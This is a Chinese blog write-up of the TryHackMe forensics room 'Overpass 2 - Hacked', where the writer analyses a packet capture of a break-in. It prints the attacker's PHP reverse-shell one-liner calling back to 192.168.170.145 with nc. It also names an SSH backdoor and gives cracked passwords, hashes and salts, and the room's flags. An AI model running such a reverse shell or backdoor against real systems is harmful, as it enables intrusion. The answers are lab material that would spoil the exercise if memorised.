tryhackme--Overpass 2 - Hacked

日常一篇博客~

今天分享的是tryhackme的一道取证题。

Task 1 -Forensics - Analyse the PCAP

#1 What was the URL of the page they used to upload a reverse shell?

查看http数据包,我们从请求和响应可以知道攻击者的ip:192.168.170.145,服务器的ip:192.168.170.159,并且/development/目录上还有一个upload.php,故答案

/development/

)

#2 What payload did the attacker use to gain access?

搜索关键字符,发现payload.php,TCP追踪流查看具体发包数据


攻击者利用upload.php新上传了一个payload.php,从内容上看是一个反弹shell

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

#3 What password did the attacker use to privesc?

继续查看该payload执行了什么命令,TCP追踪流,


该用户从www切换到james用户,密码为:

whenevernoteartinstant

#4 How did the attacker establish persistence?

继续查看攻击者的攻击命令,发现james可以以任何用户执行任何命令,这个属于配置上的错误。往下看攻击者先是看了/etc/passwd文件,再从github上面下载了一个ssh后门并安装执行。

https://github.com/NinjaJc01/ssh-backdoor

#5 Using the fasttrack wordlist, how many of the system passwords were crackable?

该服务器一共有5个用户,攻击者现在已经知道james用户的密码,只需破解剩下四个用户的密码即可,在kali使用john爆破也可以。

4

Task 2 Research - Analyse the code

#1 What’s the default hash for the backdoor?

查看mian.go

bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3

#2 What’s the hardcoded salt for the backdoor?

求该hash算法的盐

1c362db832f3f864c8c2fe05f2002a05

#3 What was the hash that the attacker used? - go back to the PCAP for this!

6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

#4 Crack the hash using rockyou and a cracking tool of your choice. What’s the password?

通过算法我们可以知道密码加盐加密成hash,即

SHA512(password + '1c362db832f3f864c8c2fe05f2002a05') = '6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed'


接下来我们用hashcat爆破密码

november16

Task 3 Attack - Get back in!

#1 The attacker defaced the website. What message did they leave as a heading?

访问http服务

H4ck3d by CooctusClan

#3 What’s the user flag?

用ssh后门登录服务器,在james在家目录找到user.txt

thm{d119b4fa8c497ddb0525f7ad200e6567}

#3 What’s the root flag?

发现一个可疑的suid文件,/home/james/.suid_bash

bash命令的提权方法,不过这个是二进制文件直接执行就好了。

执行拿到flag

thm{d53b2684f169360bb9606c333873144d}

  转载请注明: XingHe tryhackme--Overpass 2 - Hacked

  目录